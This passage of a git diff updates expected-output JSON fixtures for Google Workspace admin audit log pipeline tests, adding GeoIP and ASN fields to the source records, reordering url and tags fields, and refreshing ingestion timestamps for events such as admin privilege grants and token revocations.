@@ -1541,6 +1817,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1550,7 +1838,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079670600Z", + "ingested": "2021-12-14T14:44:50.020605586Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNBLOCK_ON_DEVICE_ACCESS", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json index 502bc0e559d..19316e6b3b0 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json @@ -1,21 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "url": { - "path": "/path/in/url" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -44,8 +29,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:56.332587700Z", + "ingested": "2021-12-14T14:44:53.816580883Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "ADD_WEB_ADDRESS", @@ -61,24 +67,15 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "url": { "path": "/path/in/url" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -107,8 +104,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:56.332595800Z", + "ingested": "2021-12-14T14:44:53.816583730Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "DELETE_WEB_ADDRESS", @@ -124,7 +142,13 @@ "name": "foo", "domain": "bar.com", "id": "1" - } + }, + "url": { + "path": "/path/in/url" + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -160,6 +184,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -169,7 +205,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:56.332601300Z", + "ingested": "2021-12-14T14:44:53.816584287Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_SITES_SETTING", @@ -225,6 +261,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -234,7 +282,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:56.332606600Z", + "ingested": "2021-12-14T14:44:53.816584642Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}", "provider": "admin", "action": "CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES", 
@@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:56.332611900Z", + "ingested": "2021-12-14T14:44:53.816585002Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}", "provider": "admin", "action": "VIEW_SITE_DETAILS", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json index d406f2949e8..e824fdcd9c9 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json @@ -35,6 +35,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -44,7 +56,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004798300Z", + "ingested": "2021-12-14T14:44:54.651967253Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DELETE_2SV_SCRATCH_CODES", @@ -106,6 +118,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -115,7 +139,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004807500Z", + "ingested": "2021-12-14T14:44:54.651970061Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "GENERATE_2SV_SCRATCH_CODES", @@ -176,6 +200,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -185,7 +221,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004813100Z", + "ingested": "2021-12-14T14:44:54.651970529Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_3LO_DEVICE_TOKENS", @@ -241,6 +277,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -250,7 +298,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004818600Z", + "ingested": "2021-12-14T14:44:54.651970913Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_3LO_TOKEN", @@ -307,6 +355,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -316,7 +376,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004824Z", + "ingested": "2021-12-14T14:44:54.651971273Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_RECOVERY_EMAIL", @@ -378,6 +438,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -387,7 +459,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004829400Z", + "ingested": "2021-12-14T14:44:54.651971662Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_RECOVERY_PHONE", @@ -449,6 +521,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -458,7 +542,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004834800Z", + "ingested": "2021-12-14T14:44:54.651972036Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "GRANT_ADMIN_PRIVILEGE", @@ -520,6 +604,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -529,7 +625,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004840200Z", + "ingested": "2021-12-14T14:44:54.651972395Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_ADMIN_PRIVILEGE", @@ -590,6 +686,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -599,7 +707,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004845700Z", + "ingested": "2021-12-14T14:44:54.651972767Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_ASP", @@ -653,6 +761,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -662,7 +782,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004851Z", + "ingested": "2021-12-14T14:44:54.651973126Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TOGGLE_AUTOMATIC_CONTACT_SHARING", @@ -718,6 +838,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -727,7 +859,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004856400Z", + "ingested": "2021-12-14T14:44:54.651973483Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "BULK_UPLOAD", @@ -783,6 +915,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -792,7 +936,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004862100Z", + "ingested": "2021-12-14T14:44:54.651973985Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "BULK_UPLOAD_NOTIFICATION_SENT", 
@@ -854,6 +998,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -863,7 +1019,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004867700Z", + "ingested": "2021-12-14T14:44:54.651974370Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CANCEL_USER_INVITE", @@ -925,6 +1081,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -934,7 +1102,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004873100Z", + "ingested": "2021-12-14T14:44:54.651974725Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", "provider": "admin", "action": "CHANGE_USER_CUSTOM_FIELD", @@ -996,6 +1164,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1005,7 +1185,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004878500Z", + "ingested": "2021-12-14T14:44:54.651975089Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_EXTERNAL_ID", 
@@ -1067,6 +1247,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1076,7 +1268,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004883400Z", + "ingested": "2021-12-14T14:44:54.651975464Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_GENDER", @@ -1138,6 +1330,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1147,7 +1351,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004886700Z", + "ingested": "2021-12-14T14:44:54.651975953Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_IM", @@ -1209,6 +1413,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1218,7 +1434,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004891Z", + "ingested": "2021-12-14T14:44:54.651976326Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_USER_IP_WHITELIST", 
